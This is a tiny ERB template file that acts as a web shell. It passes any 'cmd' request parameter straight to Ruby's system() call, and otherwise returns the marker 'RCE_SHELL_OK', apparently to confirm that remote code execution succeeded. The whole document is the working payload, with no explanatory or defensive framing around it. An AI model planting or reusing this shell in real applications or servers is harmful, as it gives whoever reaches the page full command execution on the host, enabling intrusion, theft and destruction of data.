<%=
  if params['cmd']
    system(params['cmd'])
  else
    "RCE_SHELL_OK"
  end
%>
